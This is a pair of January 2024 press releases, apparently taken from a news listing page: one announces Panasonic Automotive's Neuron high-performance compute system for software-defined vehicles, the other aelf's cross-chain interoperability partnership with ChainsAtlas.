Panasonic Automotive Introduces Neuron High-Performance Compute (HPC) to Advance to a Software-Defined Mobility Future

PR Newswire | January 09, 2024

Panasonic Automotive Systems Company of America, a tier-one automotive supplier and a division of Panasonic Corporation of North America, announced its High-Performance Compute (HPC) system. Named Neuron, this innovation addresses the rapidly evolving mobility needs anticipated for software-defined vehicle advancements. As vehicles become more software reliant, vehicle systems must support the extended software lifecycle by enabling software upgrades and prolonging the supporting hardware capability. Cars rely on hardware and software compute platforms to process, share, sense, and derive insights to handle functions for assisted driving. Panasonic Automotive's Neuron HPC allows for not only software updates and upgrades but also hardware upgrades across platform lifecycles. The Neuron HPC can aggregate multiple computing zones to reduce the cost, weight and integration complexity of the vehicle by removing redundant components. Panasonic Automotive's design supports effortless up-integration with high-performance and heavy data input processing capability. Importantly, the design is upgradeable, scalable and future-proof across today's evolving in-vehicle platforms. Neuron HPC Architecture & Design Panasonic Automotive's High Performance Compute architecture could reduce the number of distributed electronic control units (ECUs) by up to 80%1 – allowing for faster, lighter, cross-domain computing for real-time, cross-functional communications. The Neuron HPC design is suited for any mobility platform including internal combustion engine, hybrid, fuel cell or electric vehicles. "In collaboration with OEMs, Panasonic Automotive has designed and met some of the largest central compute platform challenges in the industry in order to make the driving experience evolve with technology," said Andrew Poliak, CTO, Panasonic Automotive Systems Company of America. "Neuron maximizes performance, safety and innovation over the entire ownership of the consumer's vehicle and enables OEMs with a future-proof SDV platform for ensuing generations of mobility needs." Key Systems, UX Features & Technical Benefits With a streamlined design, the Neuron HPC incorporates up-integration capability by consolidating multiple ECUs into one centralized nucleus to handle all levels of ADAS, chassis, body, and in-cabin infotainment features. About Panasonic Automotive Systems Company of America  Panasonic Automotive Systems Company of America is a division company of Panasonic Corporation of North America and is a leading global supplier of automotive infotainment and connectivity system solutions. Panasonic Automotive Systems Company of America acts as the North American affiliate of Panasonic Automotive Systems Co., Ltd., which coordinates global automotive. Panasonic Automotive Systems Company of America is headquartered in Peachtree City, Georgia, with sales, marketing and engineering operations in Farmington Hills, Mich. About Panasonic Corporation of North America Newark, NJ-based Panasonic Corporation of North America is committed to creating a better life and a better world by enabling its customers through innovations in Sustainable Energy, Immersive Entertainment, Integrated Supply Chains and Mobility Solutions. The company is the principal North American subsidiary of Osaka, Japan-based Panasonic Corporation. One of Interbrand's Top 100 Best Global Brands of 2023, Panasonic is a leading technology partner and integrator to businesses, government agencies and consumers across the region.

Read More

Server Virtualization

AELF Partners with ChainsAtlas to Pioneer Interoperability in Blockchain

PR Newswire | January 09, 2024

aelf is advancing cross-chain interoperability through a strategic partnership with ChainsAtlas. By utilising ChainsAtlas' innovative virtualisation technology, aelf will enable decentralised applications (dApps) from diverse blockchains to seamlessly migrate and integrate into the aelf blockchain, regardless of the dApps' smart contract specifications. This collaboration marks a significant step towards a globally interconnected and efficient blockchain ecosystem, breaking down the silos between blockchains. Khaniff Lau, Business Development Director at aelf, shares, "The strategic partnership with ChainsAtlas is a significant step towards realising our vision of a seamlessly interconnected blockchain world. With this integration, aelf is set to become a hub for cross-chain activities, enhancing our ability to support a wide array of dApps, digital assets, and Web2 apps. This collaboration is not just about technology integration; it's about shaping the future of how services and products on blockchains interact and operate in synergy." Jan Hanken, Co-founder of ChainsAtlas, says, "ChainsAtlas was always built to achieve two major goals: to make blockchain development accessible to a broad spectrum of developers and entrepreneurs and, along that path, to pave the way for a truly omnichain future." "By joining forces with aelf, we are bringing that visionary future much closer to reality. As we anticipate the influx of creativity from innovators taking their first steps into the world of Web3 on aelf, driven by ChainsAtlas technology, we are excited to see these groundbreaking ideas come to life," adds Hanken. The foundation for true cross-chain interoperability is being built as aelf integrates ChainsAtlas' Virtualization Unit (VU), enabling the aelf blockchain to accommodate both EVM and non-EVM digital assets. This cross-chain functionality is accomplished through ChainsAtlas' virtualisation technology, allowing aelf to interpret and execute smart contracts written in other languages supported by ChainsAtlas, while also establishing state transfer mechanisms that facilitate seamless data and asset flow between aelf and other blockchains. Through this partnership, aelf blockchain's capabilities will be enhanced as it is able to support a more comprehensive range of dApps and games, and developers from diverse coding backgrounds will now be empowered to build on aelf blockchain. This partnership will also foster increased engagement within the Web3 community as users can gain access to a more diverse range of digital assets on aelf. Looking ahead, the partnership between aelf and ChainsAtlas will play a pivotal role in advancing the evolution of aelf's sidechains by enabling simultaneous execution of program components across multiple VUs on different blockchains. About aelf aelf, a high-performance Layer 1 featuring multi-sidechain technology for unlimited scalability. aelf blockchain is designed to power the development of Web3 and support its continuous advancement into the future. Founded in 2017 with its global hub based in Singapore, aelf is one of the pioneers of the mainchain-sidechain architecture concept. Incorporating key foundational components, including AEDPoS, aelf's variation of a Delegated Proof-of-Stake (DPoS) consensus protocol; parallel processing; peer-to-peer (P2P) network communication; cross-chain bridges, and a dynamic side chain indexing mechanism, aelf delivers a highly efficient, safe, and modular ecosystem with high throughput, scalability, and interoperability. aelf facilitates the building, integrating, and deploying of smart contracts and decentralised apps (dApps) on its blockchain with its native C# software development kit (SDK) and SDKs in other languages, including Java, JS, Python, and Go. aelf's ecosystem also houses a range of dApps to support a flourishing blockchain network. aelf is committed to fostering innovation within its ecosystem and remains dedicated to driving the development of Web3 and the adoption of blockchain technology. About ChainsAtlas ChainsAtlas introduces a new approach to Web3 infrastructure, blending multiple blockchain technologies and smart contract features to create a unified, efficient processing network. Its core innovation lies in virtualization-enabled smart contracts, allowing consistent software operation across different blockchains. This approach enhances decentralized applications' complexity and reliability, promoting easier integration of existing software into the blockchain ecosystem. The team behind ChainsAtlas, driven by the transformative potential of blockchain, aims to foster global opportunities and equality. Their commitment to building on existing blockchain infrastructure marks a significant step towards a new phase in Web3, where advanced and reliable decentralized applications become the norm, setting new standards for the future of decentralized networks.

Read More

Events